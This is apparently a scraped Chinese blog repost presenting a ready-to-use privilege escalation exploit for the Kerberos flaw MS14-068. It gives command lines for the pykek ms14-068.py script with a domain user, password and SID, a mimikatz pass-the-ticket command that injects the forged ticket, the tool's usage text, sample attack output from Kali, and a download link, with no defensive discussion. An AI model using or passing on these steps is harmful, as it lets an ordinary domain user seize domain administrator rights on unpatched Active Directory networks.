zoukankan      html  css  js  c++  java

  • [提权]域内提权神器 MS14-068 完整EXP

     可以让任何域内用户提升为域管理员

     

     

    c:python27python.exe ms14-068.py -u k8test3@k8.local -p k8team!@# -s S-1-5-21-4191298166-3247023184-3514116461-1110 -d K8DNS.k8.local
    mimikatz.exe "kerberos::ptc TGT_k8test3@k8.local.ccache" exit

     

       

    ms14-068.py

    Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :

    Domain Users (513)

    Domain Admins (512)

    Schema Admins (518)

    Enterprise Admins (519)

    Group Policy Creator Owners (520)

    USAGE:

    ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr>

     

    OPTIONS:

    -p <clearPassword>

    --rc4 <ntlmHash>

    Example usage :

     

    Linux (tested with samba and MIT Kerberos)

     

    root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

    Password:

    [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done!

    [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done!

    [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done!

    [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done!

    [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done!

    [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done!

    [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done!

    [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done!

    [+] Creating ccache file 'TGT_user-a-1@dom-a.loc.ccache'... Done!

    root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0

    On Windows

    python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc

    mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit`

    下载地址

    https://github.com/bidord/pykek
  • 相关阅读:
    C# post请求,Json转换实体类
    jq div 托拉拽
    json转换成实体类
    C# 队列、锁、异步
    关于C#调用protobuf 序列化和反序列化
    关于System.Data.Entity.Infrastructure.DbUpdateException 的问题
    C# 本地CSS和JS引用无问题,部署服务器之后出现500错误
    windows服务
    下拉加载更多DEMO(js实现)
    禁用iPhone手机浏览器上给电话号码自动加上的link样式
  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5382774.html
Copyright © 2011-2022 走看看